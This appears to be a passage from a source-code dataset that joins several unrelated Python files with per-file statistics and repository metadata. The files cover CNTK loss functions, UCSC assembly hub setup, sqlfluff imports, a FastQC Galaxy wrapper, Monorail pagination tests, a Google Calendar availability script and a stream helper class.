logsumexp(A, B, ..., Y, Z), logsumexp(B, ..., Y, Z), ..., logsumexp(Y, Z), Z # y = a + logsumexp(A, B, ..., Y, Z), b + logsumexp(B, ..., Y, Z), ..., y + logsumexp(Y, Z), z + Z # now if we exponentiate each element in y we have all the terms we need. We just need to sum those exponentials... # logZ = last(sequence.logsumexp(y)) x = C.layers.Recurrence(C.log_add_exp, go_backwards=True, initial_state=-1e+30)(end_logits) y = start_logits + x logZ = C.layers.Fold(C.log_add_exp, initial_state=-1e+30)(y) return logZ - C.sequence.last(C.sequence.gather(start_logits, start_y)) - C.sequence.last(C.sequence.gather(end_logits, end_y)) def seq_hardmax(logits): seq_max = C.layers.Fold(C.element_max, initial_state=C.constant(-1e+30, logits.shape))(logits) s = C.equal(logits, C.sequence.broadcast_as(seq_max, logits)) s_acc = C.layers.Recurrence(C.plus)(s) return s * C.equal(s_acc, 1) # only pick the first one class LambdaFunc(C.ops.functions.UserFunction): def __init__(self, arg, when=lambda arg: True, execute=lambda arg: print((len(arg), arg[0].shape,) if type(arg) == list else (1, arg.shape,), arg), name=''): self.when = when self.execute = execute super(LambdaFunc, self).__init__([arg], name=name) def infer_outputs(self): return [C.output_variable(self.inputs[0].shape, self.inputs[0].dtype, self.inputs[0].dynamic_axes)] def forward(self, argument, device=None, outputs_to_retain=None): if self.when(argument): self.execute(argument) return None, argument def backward(self, state, root_gradients): return root_gradients def clone(self, cloned_inputs): return self.__init__(*cloned_inputs) def print_node(v): return C.user_function(LambdaFunc(v))
41.976608
132
0.639454
1,120
7,178
3.891964
0.157143
0.053682
0.041294
0.057811
0.417986
0.333333
0.284698
0.257857
0.219775
0.194999
0
0.009417
0.215938
7,178
171
133
41.976608
0.765103
0.104347
0
0.057143
0
0
0.013035
0
0
0
0
0
0
1
0.214286
false
0
0.042857
0.085714
0.485714
0.028571
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
e7dd0fd747c77ccfad30186eb48f1feb9667fdbd
7,400
py
Python
submodules/hal/assemblyHub/prepareHubFiles.py
pbasting/cactus
833d8ca015deecdfa5d0aca01211632cdaca9e58
[ "MIT-0" ]
null
null
null
submodules/hal/assemblyHub/prepareHubFiles.py
pbasting/cactus
833d8ca015deecdfa5d0aca01211632cdaca9e58
[ "MIT-0" ]
null
null
null
submodules/hal/assemblyHub/prepareHubFiles.py
pbasting/cactus
833d8ca015deecdfa5d0aca01211632cdaca9e58
[ "MIT-0" ]
null
null
null
#!/usr/bin/env python #Copyright (C) 2013 by Ngan Nguyen # #Released under the MIT license, see LICENSE.txt """ Make "hub.txt", "groups.txt", files that are required by AssemblyHub Also prepare description.html files """ import os, sys from sonLib.bioio import system from optparse import OptionGroup from hal.assemblyHub.assemblyHubCommon import getProperName from Bio import Phylo from hal.assemblyHub.treeCommon import isBinaryTree def writeDescriptionFile(genome, outdir): filename = os.path.join(outdir, "description.html") f = open(filename, 'w') f.write("%s\n" %genome) f.close() return def writeTrackDb_composite_html(file, treeFile): f = open(file, 'w') #HACK: #huburl = "http://hgwdev.cse.ucsc.edu/~nknguyen/ecoli/hub/TEST2" huburl = "http://hgwdev.cse.ucsc.edu/~nknguyen/birds/birds2" basename = os.path.basename(treeFile) f.write("<img src=\"%s/%s\">\n" %(huburl, basename)) f.close() def writeTrackDb_compositeStart(f, shortLabel, longLabel, bbdirs, bwdirs, genomes, properName, url, img): #Composite track includes all annotations in BED & WIGGLE formats, their lifted-over tracks, and Snake tracks f.write("track hubCentral\n") f.write("compositeTrack on\n") f.write("shortLabel %s\n" %shortLabel) f.write("longLabel %s\n" %longLabel) f.write("group comphub\n") bedtracktypes = [os.path.basename(b.rstrip('/')) for b in bbdirs] bedstr = " ".join(["%s=%s" %(item, item) for item in bedtracktypes]) wigtracktypes = [os.path.basename(b.rstrip('/')) for b in bwdirs] wigstr = " ".join(["%s=%s" %(item, item) for item in wigtracktypes]) f.write("subGroup1 view Track_Type Snake=Alignments %s %s\n" %(bedstr, wigstr)) genomeStr = " ".join(["%s=%s" %(g, getProperName(g, properName)) for g in genomes]) f.write("subGroup2 orgs Organisms %s\n" %genomeStr) f.write("dragAndDrop subTracks\n") f.write("#allButtonPair on\n") #f.write("sortOrder view=+ orgs=+\n") f.write("dimensions dimensionX=view dimensionY=orgs\n") f.write("noInherit on\n") f.write("priority 0\n") f.write("centerLabelsDense on\n") f.write("visibility full\n") f.write("html ../documentation/hubCentral\n") if url and img: imgurl = os.path.join(url, os.path.basename(img)) f.write("treeImage %s\n" %imgurl) f.write("type bigBed 3\n") f.write("\n") def writeTrackDb_compositeSubTrack(f, name, visibility): f.write("\ttrack hubCentral%s\n" %name) f.write("\tshortLabel %s\n" %name) f.write("\tview %s\n" %name) f.write("\tvisibility %s\n" %visibility) f.write("\tsubTrack hubCentral\n") f.write("\n") def writeGroupFile(outdir, hubLabel, annotations): filename = os.path.join(outdir, "groups.txt") f = open(filename, 'w') f.write("name user\n") f.write("label Custom\n") f.write("priority 1\n") f.write("defaultIsClosed 1\n") f.write("\n") f.write("name map\n") f.write("label Mapping\n") f.write("priority 2\n") f.write("defaultIsClosed 0\n") f.write("\n") f.write("name comphub\n") f.write("label %s\n" % hubLabel) f.write("priority 3\n") f.write("defaultIsClosed 0\n") f.write("\n") f.write("name snake\n") f.write("label Alignment Snakes\n") f.write("priority 3\n") f.write("defaultIsClosed 0\n") f.write("\n") for annotation in annotations: f.write("name annotation%s\n" %annotation) f.write("label %s Annotations\n" % annotation.capitalize() ) f.write("priority 3\n") f.write("defaultIsClosed 1\n") f.write("\n") f.write("name exp\n") f.write("label Experimental\n") f.write("priority 4\n") f.write("defaultIsClosed 1\n") f.write("\n") f.close() def writeHubFile(outdir, options): hubfile = os.path.join(outdir, "hub.txt") f = open(hubfile, "w") f.write("hub %s\n" %options.hubLabel) f.write("shortLabel %s\n" %options.shortLabel) f.write("longLabel %s\n" %options.longLabel) f.write("genomesFile genomes.txt\n") f.write("email %s\n" %options.email) f.close() #=========== READ FILES =========== def readList(file): items = [] f = open(file, 'r') for line in f: items.append(line.strip()) f.close() return items def readRename(file): name2new = {} f = open(file, 'r') for line in f: line = line.strip() if len(line) == 0 or line[0] == "#": continue items = line.split('\t') if len(items) >=2: name2new[items[0]] = items[1] f.close() return name2new #=========== OPTIONS ============= def addHubOptions(parser): group = OptionGroup(parser, "HUB INFORMATION") group.add_option('--hub', dest='hubLabel', default='myHub', help='a single-word name of the directory containing the track hub files. Not displayed to hub users. Default=%default') group.add_option('--shortLabel', dest='shortLabel', default='my hub', help='the short name for the track hub. Suggested maximum length is 17 characters. Displayed as the hub name on the Track Hubs page and the track group name on the browser tracks page. Default=%default') group.add_option('--longLabel', dest='longLabel', default='my hub', help='a longer descriptive label for the track hub. Suggested maximum length is 80 characters. Displayed in the description field on the Track Hubs page. Default=%default') group.add_option('--email', dest='email', default='NoEmail', help='the contact to whom questions regarding the track hub should be directed. Default=%default') group.add_option('--genomes', dest='genomes', help='File specified list of genomes to make browser for. If specified, only create browsers for these genomes in the order provided by the list. Otherwise create browsers for all genomes in the input hal file') group.add_option('--rename', dest='rename', help='File that maps halfile genomeNames to names displayed on the browser. Format: <halGenomeName>\\t<genomeNameToDisplayOnBrowser>. Default=%default') group.add_option('--tree', dest='treeFile', help='Newick binary tree. The order of the tracks and the default track layout will be based on this tree if option "genomes" is not specified. If not specified, try to extract the newick tree from the input halfile.') group.add_option('--url', dest='url', help='Public url of the hub location') group.add_option('--twobitdir', dest='twobitdir', help='Optional. Directory containing the 2bit files of each genomes. Default: extract from the input hal file.') parser.add_option_group(group) def checkHubOptions(parser, options): if options.genomes: options.genomes = readList(options.genomes) options.properName = {} if options.rename and os.path.exists(options.rename): options.properName = readRename(options.rename) options.treeFig = None options.leaves = None options.tree = None if options.treeFile and not os.path.exists(options.treeFile): parser.error("The tree file %s does not exist.\n" %options.tree) elif options.treeFile: tree = Phylo.read(options.treeFile, 'newick') if isBinaryTree(tree): options.tree = tree else: sys.stderr.write("Warnning: tree %s is not a binary tree. Will be ignored!" %options.treeFile)
40.217391
277
0.662027
1,040
7,400
4.695192
0.263462
0.076183
0.054475
0.013107
0.199058
0.146222
0.113864
0.099939
0.052632
0.052632
0
0.00582
0.187297
7,400
183
278
40.437158
0.806119
0.065811
0
0.202797
0
0.041958
0.373169
0.011313
0
0
0
0
0
1
0.06993
false
0
0.041958
0
0.132867
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
e7defab092a8c6a31ee2f6d14dfbb7eb3596456d
475
py
Python
src/sqlfluff/core/__init__.py
pvonglehn/sqlfluff
61eb251ee96b1b70aa477f3a2f2b9c351a04c1e8
[ "MIT" ]
null
null
null
src/sqlfluff/core/__init__.py
pvonglehn/sqlfluff
61eb251ee96b1b70aa477f3a2f2b9c351a04c1e8
[ "MIT" ]
null
null
null
src/sqlfluff/core/__init__.py
pvonglehn/sqlfluff
61eb251ee96b1b70aa477f3a2f2b9c351a04c1e8
[ "MIT" ]
1
2021-03-07T21:49:52.000Z
2021-03-07T21:49:52.000Z
"""The core elements of sqlfluff.""" # flake8: noqa: F401 # Config objects from sqlfluff.core.config import FluffConfig # Public classes from sqlfluff.core.linter import Linter from sqlfluff.core.parser import Lexer, Parser # Dialect introspection from sqlfluff.core.dialects import dialect_selector, dialect_readout # All of the errors. from sqlfluff.core.errors import ( SQLBaseError, SQLTemplaterError, SQLLexError, SQLParseError, SQLLintError, )
20.652174
68
0.768421
56
475
6.482143
0.535714
0.165289
0.220386
0
0
0
0
0
0
0
0
0.010025
0.16
475
22
69
21.590909
0.899749
0.254737
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.454545
0
0.454545
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
3
e7e190c401cd34896ce2b8d4d09a1b734e5c48e3
6,698
py
Python
tools/fastqc/rgFastQC.py
bebatut/tools-iuc
4fb528145289ad4db04e4589c02e9ddaa1194138
[ "MIT" ]
null
null
null
tools/fastqc/rgFastQC.py
bebatut/tools-iuc
4fb528145289ad4db04e4589c02e9ddaa1194138
[ "MIT" ]
null
null
null
tools/fastqc/rgFastQC.py
bebatut/tools-iuc
4fb528145289ad4db04e4589c02e9ddaa1194138
[ "MIT" ]
null
null
null
""" Rewrite of rgFastQC.py for Version 0.11.2 of FastQC. Changes implemented from tmcgowan at https://testtoolshed.g2.bx.psu.edu/view/tmcgowan/fastqc and iuc at https://toolshed.g2.bx.psu.edu/view/iuc/fastqc with minor changes and bug fixes SYNOPSIS rgFastQC.py -i input_file -j input_file.name -o output_html_file [-d output_directory] [-f fastq|bam|sam] [-n job_name] [-c contaminant_file] [-e fastqc_executable] EXAMPLE (generated by Galaxy) rgFastQC.py -i path/dataset_1.dat -j 1000gsample.fastq -o path/dataset_3.dat -d path/job_working_directory/subfolder -f fastq -n FastQC -c path/dataset_2.dat -e fastqc """ import bz2 import glob import gzip import mimetypes import optparse import os import re import shutil import subprocess import tempfile import zipfile class FastQCRunner(object): def __init__(self, opts=None): ''' Initializes an object to run FastQC in Galaxy. To start the process, use the function run_fastqc() ''' # Check whether the options are specified and saves them into the object assert opts is not None self.opts = opts def prepare_command_line(self): ''' Develops the Commandline to run FastQC in Galaxy ''' # Check whether a given file compression format is valid # This prevents uncompression of already uncompressed files infname = self.opts.inputfilename linf = infname.lower() informat = self.opts.informat trimext = False # decompression at upload currently does NOT remove this now bogus ending - fastqc will barf # patched may 29 2013 until this is fixed properly ftype = mimetypes.guess_type(self.opts.input) if linf.endswith('.gz') or linf.endswith('.gzip') or ftype[-1] == "gzip" or informat.endswith('.gz'): f = gzip.open(self.opts.input) try: f.readline() ftype = ['gzip'] except Exception: trimext = True f.close() elif linf.endswith('bz2') or informat.endswith('.bz2'): f = bz2.BZ2File(self.opts.input, 'r') try: ftype = ['bzip2'] f.readline() except Exception: trimext = True f.close() elif linf.endswith('.zip'): if not zipfile.is_zipfile(self.opts.input): trimext = True if trimext: f = open(self.opts.input) try: f.readline() except Exception: raise Exception("Input file corruption, could not identify the filetype") infname = os.path.splitext(infname)[0] # Replace unwanted or problematic charaters in the input file name self.fastqinfilename = re.sub(r'[^a-zA-Z0-9_\-\.]', '_', os.path.basename(infname)) # check that the symbolic link gets a proper ending, fastqc seems to ignore the given format otherwise if 'fastq' in self.opts.informat: # with fastq the .ext is ignored, but when a format is actually passed it must comply with fastqc's # accepted formats.. self.opts.informat = 'fastq' elif not self.fastqinfilename.endswith(self.opts.informat): self.fastqinfilename += '.%s' % self.opts.informat # Build the Commandline from the given parameters command_line = [opts.executable, '--outdir %s' % self.opts.outputdir] if self.opts.contaminants is not None: command_line.append('--contaminants %s' % self.opts.contaminants) if self.opts.limits is not None: command_line.append('--limits %s' % self.opts.limits) command_line.append('--quiet') command_line.append('--extract') # to access the output text file if ftype[-1] == 'gzip': self.fastqinfilename += '.gz' elif ftype[-1] == 'bzip2': self.fastqinfilename += '.bz2' else: command_line.append('-f %s' % self.opts.informat) command_line.append(self.fastqinfilename) self.command_line = ' '.join(command_line) def copy_output_file_to_dataset(self): ''' Retrieves the output html and text files from the output directory and copies them to the Galaxy output files ''' # retrieve html file result_file = glob.glob(self.opts.outputdir + '/*html') with open(result_file[0], 'rb') as fsrc: with open(self.opts.htmloutput, 'wb') as fdest: shutil.copyfileobj(fsrc, fdest) # retrieve text file text_file = glob.glob(self.opts.outputdir + '/*/fastqc_data.txt') with open(text_file[0], 'rb') as fsrc: with open(self.opts.textoutput, 'wb') as fdest: shutil.copyfileobj(fsrc, fdest) def run_fastqc(self): ''' Executes FastQC. Make sure the mandatory import parameters input, inputfilename, outputdir and htmloutput have been specified in the options ''' # Create a log file dummy, tlog = tempfile.mkstemp(prefix='rgFastQC', suffix=".log", dir=self.opts.outputdir) sout = open(tlog, 'w') self.prepare_command_line() sout.write(self.command_line) sout.write('\n') sout.write("Creating symlink\n") # between the input (.dat) file and the given input file name os.symlink(self.opts.input, self.fastqinfilename) sout.write("check_call\n") subprocess.check_call(self.command_line, shell=True) sout.write("Copying working %s file to %s \n" % (self.fastqinfilename, self.opts.htmloutput)) self.copy_output_file_to_dataset() sout.write("Finished") sout.close() if __name__ == '__main__': op = optparse.OptionParser() op.add_option('-i', '--input', default=None) op.add_option('-j', '--inputfilename', default=None) op.add_option('-o', '--htmloutput', default=None) op.add_option('-t', '--textoutput', default=None) op.add_option('-d', '--outputdir', default="/tmp/shortread") op.add_option('-f', '--informat', default='fastq') op.add_option('-n', '--namejob', default='rgFastQC') op.add_option('-c', '--contaminants', default=None) op.add_option('-l', '--limits', default=None) op.add_option('-e', '--executable', default='fastqc') opts, args = op.parse_args() assert opts.input is not None assert opts.inputfilename is not None assert opts.htmloutput is not None if not os.path.exists(opts.outputdir): os.makedirs(opts.outputdir) fastqc_runner = FastQCRunner(opts) fastqc_runner.run_fastqc()
39.169591
148
0.627351
853
6,698
4.838218
0.311841
0.0504
0.026654
0.023261
0.163315
0.094984
0.068331
0.037315
0.037315
0
0
0.007049
0.258734
6,698
170
149
39.4
0.824169
0.27456
0
0.145455
0
0
0.102424
0
0
0
0
0
0.036364
1
0.036364
false
0
0.1
0
0.145455
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99adaa9fbb76e38861e85eb3688d0298edfd1677
5,563
py
Python
appengine/monorail/framework/test/paginate_test.py
allaparthi/monorail
e18645fc1b952a5a6ff5f06e0c740d75f1904473
[ "BSD-3-Clause" ]
null
null
null
appengine/monorail/framework/test/paginate_test.py
allaparthi/monorail
e18645fc1b952a5a6ff5f06e0c740d75f1904473
[ "BSD-3-Clause" ]
7
2022-02-15T01:11:37.000Z
2022-03-02T12:46:13.000Z
appengine/monorail/framework/test/paginate_test.py
allaparthi/monorail
e18645fc1b952a5a6ff5f06e0c740d75f1904473
[ "BSD-3-Clause" ]
null
null
null
# Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style # license that can be found in the LICENSE file or at # https://developers.google.com/open-source/licenses/bsd """Unit tests for pagination classes.""" from __future__ import print_function from __future__ import division from __future__ import absolute_import import unittest from google.appengine.ext import testbed from framework import exceptions from framework import paginate from testing import testing_helpers from proto import secrets_pb2 class PageTokenTest(unittest.TestCase): def setUp(self): self.testbed = testbed.Testbed() self.testbed.activate() self.testbed.init_memcache_stub() self.testbed.init_datastore_v3_stub() def testGeneratePageToken_DiffRequests(self): request_cont_1 = secrets_pb2.ListRequestContents( parent='same', page_size=1, order_by='same', query='same') request_cont_2 = secrets_pb2.ListRequestContents( parent='same', page_size=2, order_by='same', query='same') start = 10 self.assertNotEqual( paginate.GeneratePageToken(request_cont_1, start), paginate.GeneratePageToken(request_cont_2, start)) def testValidateAndParsePageToken(self): request_cont_1 = secrets_pb2.ListRequestContents( parent='projects/chicken', page_size=1, order_by='boks', query='hay') start = 2 token = paginate.GeneratePageToken(request_cont_1, start) self.assertEqual( start, paginate.ValidateAndParsePageToken(token, request_cont_1)) def testValidateAndParsePageToken_InvalidContents(self): request_cont_1 = secrets_pb2.ListRequestContents( parent='projects/chicken', page_size=1, order_by='boks', query='hay') start = 2 token = paginate.GeneratePageToken(request_cont_1, start) request_cont_diff = secrets_pb2.ListRequestContents( parent='projects/goose', page_size=1, order_by='boks', query='hay') with self.assertRaises(exceptions.PageTokenException): paginate.ValidateAndParsePageToken(token, request_cont_diff) def testValidateAndParsePageToken_InvalidSerializedToken(self): request_cont = secrets_pb2.ListRequestContents() with self.assertRaises(exceptions.PageTokenException): paginate.ValidateAndParsePageToken('sldkfj87', request_cont) def testValidateAndParsePageToken_InvalidTokenFormat(self): request_cont = secrets_pb2.ListRequestContents() with self.assertRaises(exceptions.PageTokenException): paginate.ValidateAndParsePageToken('///sldkfj87', request_cont) class PaginateTest(unittest.TestCase): def testVirtualPagination(self): # Paginating 0 results on a page that can hold 100. mr = testing_helpers.MakeMonorailRequest(path='/issues/list') total_count = 0 items_per_page = 100 start = 0 vp = paginate.VirtualPagination(total_count, items_per_page, start) self.assertEqual(vp.num, 100) self.assertEqual(vp.start, 1) self.assertEqual(vp.last, 0) self.assertFalse(vp.visible) # Paginating 12 results on a page that can hold 100. mr = testing_helpers.MakeMonorailRequest(path='/issues/list') vp = paginate.VirtualPagination(12, 100, 0) self.assertEqual(vp.num, 100) self.assertEqual(vp.start, 1) self.assertEqual(vp.last, 12) self.assertTrue(vp.visible) # Paginating 12 results on a page that can hold 10. mr = testing_helpers.MakeMonorailRequest(path='/issues/list?num=10') vp = paginate.VirtualPagination(12, 10, 0) self.assertEqual(vp.num, 10) self.assertEqual(vp.start, 1) self.assertEqual(vp.last, 10) self.assertTrue(vp.visible) # Paginating 12 results starting at 5 on page that can hold 10. mr = testing_helpers.MakeMonorailRequest( path='/issues/list?start=5&num=10') vp = paginate.VirtualPagination(12, 10, 5) self.assertEqual(vp.num, 10) self.assertEqual(vp.start, 6) self.assertEqual(vp.last, 12) self.assertTrue(vp.visible) # Paginating 123 results on a page that can hold 100. mr = testing_helpers.MakeMonorailRequest(path='/issues/list') vp = paginate.VirtualPagination(123, 100, 0) self.assertEqual(vp.num, 100) self.assertEqual(vp.start, 1) self.assertEqual(vp.last, 100) self.assertTrue(vp.visible) # Paginating 123 results on second page that can hold 100. mr = testing_helpers.MakeMonorailRequest(path='/issues/list?start=100') vp = paginate.VirtualPagination(123, 100, 100) self.assertEqual(vp.num, 100) self.assertEqual(vp.start, 101) self.assertEqual(vp.last, 123) self.assertTrue(vp.visible) # Paginating a huge number of objects will show at most 1000 per page. mr = testing_helpers.MakeMonorailRequest(path='/issues/list?num=9999') vp = paginate.VirtualPagination(12345, 9999, 0) self.assertEqual(vp.num, 1000) self.assertEqual(vp.start, 1) self.assertEqual(vp.last, 1000) self.assertTrue(vp.visible) # Test urls for a hotlist pagination mr = testing_helpers.MakeMonorailRequest( path='/u/hotlists/17?num=5&start=4') mr.hotlist_id = 17 mr.auth.user_id = 112 vp = paginate.VirtualPagination(12, 5, 4, list_page_url='/u/112/hotlists/17') self.assertEqual(vp.num, 5) self.assertEqual(vp.start, 5) self.assertEqual(vp.last, 9) self.assertTrue(vp.visible) self.assertEqual('/u/112/hotlists/17?num=5&start=9', vp.next_url) self.assertEqual('/u/112/hotlists/17?num=5&start=0', vp.prev_url)
38.10274
77
0.729642
707
5,563
5.61669
0.224894
0.101989
0.102745
0.070511
0.618736
0.543692
0.533115
0.469907
0.421556
0.352304
0
0.045033
0.165738
5,563
145
78
38.365517
0.810601
0.121697
0
0.357798
0
0
0.070856
0.033272
0
0
0
0
0.357798
1
0.06422
false
0
0.082569
0
0.165138
0.009174
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99addb00927f314ffddb52609797a63c1bd4e073
4,022
py
Python
backend/google_calendar.py
engineerjoe440/djjoecalendar
02e88861d460d71527bf5d714913fd148579b258
[ "MIT" ]
null
null
null
backend/google_calendar.py
engineerjoe440/djjoecalendar
02e88861d460d71527bf5d714913fd148579b258
[ "MIT" ]
null
null
null
backend/google_calendar.py
engineerjoe440/djjoecalendar
02e88861d460d71527bf5d714913fd148579b258
[ "MIT" ]
null
null
null
################################################################################ """ DJ JOE Website Availability Calendar ------------------------------------ (c) 2021 - Stanley Solutions - Joe Stanley This application serves the React frontend required to demonstrate the available dates for DJ Joe Services. """ ################################################################################ # Import Requisites import os import datetime import requests from date_support import daterange, _clean_dates, _restore_datetimes ENV_API_KEY = "GOOGLE_API_KEY" BASE_URL = ( "https://clients6.google.com/calendar/v3/calendars/engineerjoe440@gmail.com" "/events?calendarId=engineerjoe440%40gmail.com&singleEvents=true&timeZone=" "America%2FLos_Angeles&maxAttendees=1&maxResults=250&sanitizeHtml=true&" "timeMin={TIME_MIN}&timeMax={TIME_MAX}&key={API_KEY}" ) ################################################################################ # Supporting Functions def googlify_datetimes(dts): dts = _restore_datetimes(_clean_dates(dts)) return [dt.isoformat()+"Z" for dt in dts] def get_google_date(google_dt_dict): """Performs dictionary-specific handling to attempt extraction of dt.""" google_dt = google_dt_dict.get('dateTime', google_dt_dict.get('date')) return google_dt.split("T")[0] def get_google_time(google_dt_dict): """Performs dictionary-specific handling to attempt extraction of dt.""" google_dt = google_dt_dict.get('dateTime', google_dt_dict.get('date')) try: timestring = google_dt.split("T")[1].split('-')[0] except IndexError: timestring = "00:00:00" return timestring ################################################################################ # Event Listing Functions def get_event_list(start: datetime.datetime, end: datetime.datetime): """Identifies a list of all events in the specified date range.""" start, end = googlify_datetimes([start, end]) # Call the Calendar API REQ_URL = BASE_URL.format( TIME_MIN = start, TIME_MAX = end, API_KEY = os.getenv(ENV_API_KEY), ) print(REQ_URL) resp = requests.get(REQ_URL) if resp.status_code == 200: return resp.json().get('items', []) else: print( "GOOGLE REQUEST FAILED:", resp.status_code, resp.reason, ) return [] def get_occupied_dates(start: datetime.datetime, end: datetime.datetime): """Generates a list of single dt objects representing occupied dates.""" events = get_event_list(start=start, end=end) occupied_dates = [] # Iteratively process each event for event in events: start_date = datetime.datetime.strptime( get_google_date(event['start']), "%Y-%m-%d", ) end = event.get('end') if end != None: end_date = get_google_date(end) end_time = datetime.datetime.strptime(get_google_time(end), "%H:%M:%S") if end_date != None and end_time.hour != 0: end_date = datetime.datetime.strptime(end_date, "%Y-%m-%d") for date in daterange(start_date, end_date): # Append all dates in range occupied_dates.append(date) else: # Append only start date occupied_dates.append(start_date) else: # Append only start date occupied_dates.append(start_date) return occupied_dates if __name__ == '__main__': now = datetime.datetime.now() - datetime.timedelta(days=20) events = get_event_list(now, now + datetime.timedelta(days=30)) for event in events: print(event['start'].get('dateTime', event['start'].get('date'))) if len(events) == 0: print("NO EVENTS FOUND") events = get_occupied_dates(now, now + datetime.timedelta(days=30)) for event in events: print("event", event) if len(events) == 0: print("NO EVENTS FOUND")
34.973913
83
0.592491
470
4,022
4.876596
0.314894
0.034904
0.031414
0.026178
0.287958
0.259162
0.224258
0.224258
0.19808
0.19808
0
0.012662
0.21457
4,022
115
84
34.973913
0.712884
0.168324
0
0.186667
0
0
0.147777
0.064861
0
0
0
0
0
1
0.066667
false
0
0.053333
0
0.2
0.08
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99aff1381f53e0fd438acad0daa71781fe93be07
5,764
py
Python
seutil/Stream.py
JiyangZhang/seutil
6a2d0961a5f78f2adbf9f0b5f292f6be71780ca2
[ "Apache-2.0" ]
6
2020-07-02T02:39:59.000Z
2022-02-08T18:38:39.000Z
seutil/Stream.py
JiyangZhang/seutil
6a2d0961a5f78f2adbf9f0b5f292f6be71780ca2
[ "Apache-2.0" ]
5
2020-11-29T02:26:50.000Z
2022-01-24T16:26:54.000Z
seutil/Stream.py
JiyangZhang/seutil
6a2d0961a5f78f2adbf9f0b5f292f6be71780ca2
[ "Apache-2.0" ]
1
2020-10-09T23:31:22.000Z
2020-10-09T23:31:22.000Z
from pathlib import Path import numpy as np import random import subprocess from typing import * from .IOUtils import IOUtils class Stream: """ Streams help manipulate sequences of objects. """ def __init__(self): self.items = list() return @classmethod def of(cls, one_or_more_items): """ Get a new stream from the item / items. :param one_or_more_items: is converted to list with builtin `list` function. """ stream = Stream() if one_or_more_items is not None: stream.items = list(one_or_more_items) # end if, if return stream @classmethod def of_files(cls, dir_path: Union[str, Path]): """ Get a stream of the files under the directory. """ with IOUtils.cd(dir_path): cmd_find = "find -mindepth 1 -maxdepth 1 -type f" files = subprocess.run(["bash","-c",cmd_find], stdout=subprocess.PIPE).stdout.decode("utf-8").split("\n")[:-1] # end with files = [file[2:] for file in files] stream = cls.of(files) stream.sorted() return stream @classmethod def of_dirs(cls, dir_path: Union[str, Path]): """ Get a stream of the sub-directories under the directory. """ with IOUtils.cd(dir_path): cmd_find = "find -mindepth 1 -maxdepth 1 -type d" dirs = subprocess.run(["bash","-c",cmd_find], stdout=subprocess.PIPE).stdout.decode("utf-8").split("\n")[:-1] # end with dirs = [dir[2:] for dir in dirs] stream = cls.of(dirs) stream.sorted() return stream def filter(self, predicate_func: Callable[[object], bool]): """ Returns a stream consisting of the elements of this stream that match the given predicate. """ return Stream.of(item for item in self.items if predicate_func(item)) def count(self): return sum(self.items) def reduce(self, count_func: Callable[[str], float] = lambda x: 1): return sum([count_func(f) for f in self.items]) def sorted(self, key: Callable[[str], object] = lambda f: f, reverse: bool = False): """ Sorts the list of files in the dataset. """ list.sort(self.items, key=key, reverse=reverse) return self def map(self, map_func: Callable[[str], object], errors: str = "raise", default: object = ""): def new_items_generator(): for item in self.items: try: new_item = map_func(item) except: if errors == "ignore": yield default else: raise else: yield new_item # end for # end def return Stream.of(new_items_generator()) def peak(self, peak_func: Callable[[str], None], errors: str = "ignore"): for item in self.items: try: peak_func(item) except: if errors == "ignore": continue else: raise # end for return self def split(self, fraction_list: List[float], count_func: Callable[[str], float] = lambda x: 1): """ Splits the dataset as each part specified by the fractions (assumed to sum up to 1). Splitting is done by finding the cutting points. If randomization is needed, call shuffle first. :param count_func: customize the number of data counts in each file. """ if self.is_empty(): return tuple(Stream() for i in range(len(fraction_list))) count_list = [count_func(f) for f in self.items] cum_count_list = np.cumsum(count_list) cum_expected_count_list = [f * cum_count_list[-1] for f in np.cumsum(fraction_list)] cut_index_list = [] last_i = 0 for i, cum_count in enumerate(cum_count_list): if cum_count >= cum_expected_count_list[len(cut_index_list)]: last_i = i+1 cut_index_list.append(i+1) if len(cut_index_list) >= len(cum_expected_count_list): break # end if # end for if if last_i != len(cum_count_list): cut_index_list.append(len(cum_count_list)) # end if cut_index_list.insert(0,0) return tuple(Stream.of(self.items[cut_index_list[i]:cut_index_list[i + 1]]) for i in range(len(cut_index_list) - 1)) def shuffle(self, seed=None): """ Shuffles the list of files in the dataset. """ random.seed(seed) random.shuffle(self.items) return self def get(self, index: int): return self.items[index] def is_empty(self): return len(self.items) == 0 def __getitem__(self, item): new_items = self.items.__getitem__(item) if not isinstance(item, slice): new_items = [new_items] return Stream.of(new_items) def __setitem__(self, key, value): return self.items.__setitem__(key, value) def __delitem__(self, key): return self.items.__delitem__(key) def __iter__(self): return self.items.__iter__() def __len__(self): return self.items.__len__() def __str__(self): return "Stream with {} items".format(len(self.items)) def __repr__(self): return self.__str__() def __add__(self, other): if isinstance(other, Stream): return Stream.of(self.items+other.items) else: raise NotImplementedError
32.022222
124
0.566967
733
5,764
4.251023
0.231924
0.054878
0.03466
0.017972
0.270218
0.202182
0.170732
0.154044
0.116816
0.116816
0
0.005704
0.330847
5,764
179
125
32.201117
0.802178
0.133588
0
0.228814
0
0
0.029467
0
0
0
0
0
0
1
0.194915
false
0
0.050847
0.084746
0.449153
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99b7f2669bc39124ccbb858ced46317dfc7b5280
7,789
py
Python
packages/dinesti/python/_grab.py
USEPA/Water-Security-Toolkit
6b6b68e0e1b3dcc8023b453ab48a64f7fd740feb
[ "BSD-3-Clause" ]
3
2019-06-10T18:04:14.000Z
2020-12-05T18:11:40.000Z
packages/dinesti/python/_grab.py
